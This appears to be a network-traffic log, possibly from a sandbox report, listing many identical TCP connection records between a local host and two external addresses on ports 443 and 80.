Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
